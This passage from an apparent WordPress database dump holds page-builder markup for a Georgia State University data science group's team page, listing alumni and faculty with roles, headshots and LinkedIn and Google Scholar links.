Science<\\/span><\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/reshmanjali-guntupalli\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c405\",\"index\":1,\"id\":\"182-c409\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c410\",\"parentId\":\"182-c255\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c410\",\"index\":0,\"id\":\"182-c411\",\"partialId\":182,\"styleRef\":913,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Bronson.png\",\"caption\":{\"text\":\"\"},\"imageId\":817,\"size\":\"\"},\"domuuid\":\"182-c257\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c410\",\"index\":0,\"id\":\"182-c412\",\"partialId\":182,\"styleRef\":914,\"type\":\"content\",\"props\":{\"content\":\"Bronson Tharpe\"},\"domuuid\":\"182-c258\"},{\"name\":\"hop-text\",\"parentId\":\"182-c410\",\"index\":2,\"id\":\"182-c413\",\"partialId\":182,\"styleRef\":915,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"},\"domuuid\":\"182-c259\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/bronson-tharpe-9b754a1ba\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c410\",\"index\":1,\"id\":\"182-c414\",\"partialId\":182,\"styleRef\":917,\"type\":\"content\",\"domuuid\":\"182-c261\"}],\"styleRef\":912,\"type\":\"content\"}],\"id\":\"182-c255\",\"parentId\":\"182-c254\",\"partialId\":182,\"styleRef\":911,\"type\":\"content\"}],\"id\":\"182-c254\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Alumni\"},\"id\":\"182-c282\",\"parentId\":\"182-c281\",\"partialId\":182,\"styleRef\":926,\"type\":\"content\"}],\"id\":\"182-c281\",\"parentId\":\"182-c280\",\"partialId\":182,\"styleRef\":925,\"type\":\"content\"}],\"id\":\"182-c280\",\"parentId\":\"182-c254\",\"partialId\":182,\"styleRef\":924,\"type\":\"content\"}]},\"styleRef\":910,\"type\":\"content\"}],\"id\":\"182-c1\",\"partialId\":182,\"styleRef\":407,\"type\":\"content\"}','','','inherit','closed','closed','','562-revision-v1','','','2023-09-29 22:15:14','2023-09-30 02:15:14','',562,'https://gsudice.dataconn.net/?p=1617',0,'revision','',0),(1618,1,'2023-09-29 22:15:14','2023-09-30 02:15:14','<div data-colibri-id=\"182-c1\" class=\"style-407 style-local-182-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c425\" id=\"faculty\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-970 style-local-182-c425 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c451\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-984 style-local-182-c451 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-985-outer style-local-182-c452-outer\">\n            <div data-colibri-id=\"182-c452\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-985 style-local-182-c452 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c453\" class=\"h-global-transition-all h-heading style-986 style-local-182-c453 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-986 style-local-182-c453\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Faculty</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c426\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-971 style-local-182-c426 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c427-outer\">\n            <div data-colibri-id=\"182-c427\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c427 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c428\" class=\"d-block style-973 style-local-182-c428 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-headshot.jpg\" class=\"wp-image-629 style-973-image style-local-182-c428-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c428-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c429\" class=\"h-global-transition-all h-heading style-974 style-local-182-c429 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c429\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c430\" class=\"h-text h-text-component style-975 style-local-182-c430 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c431\" class=\"h-text h-text-component style-976 style-local-182-c431 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c432\" class=\"style-977 style-local-182-c432 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c433-outer\">\n            <div data-colibri-id=\"182-c433\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c433 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c434\" class=\"d-block style-978 style-local-182-c434 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Portrait-1.jpeg\" class=\"wp-image-1409 style-978-image style-local-182-c434-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c434-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c435\" class=\"h-global-transition-all h-heading style-974 style-local-182-c435 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c435\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c436\" class=\"h-text h-text-component style-975 style-local-182-c436 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c437\" class=\"h-text h-text-component style-976 style-local-182-c437 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c438\" class=\"style-979 style-local-182-c438 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c439-outer\">\n            <div data-colibri-id=\"182-c439\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 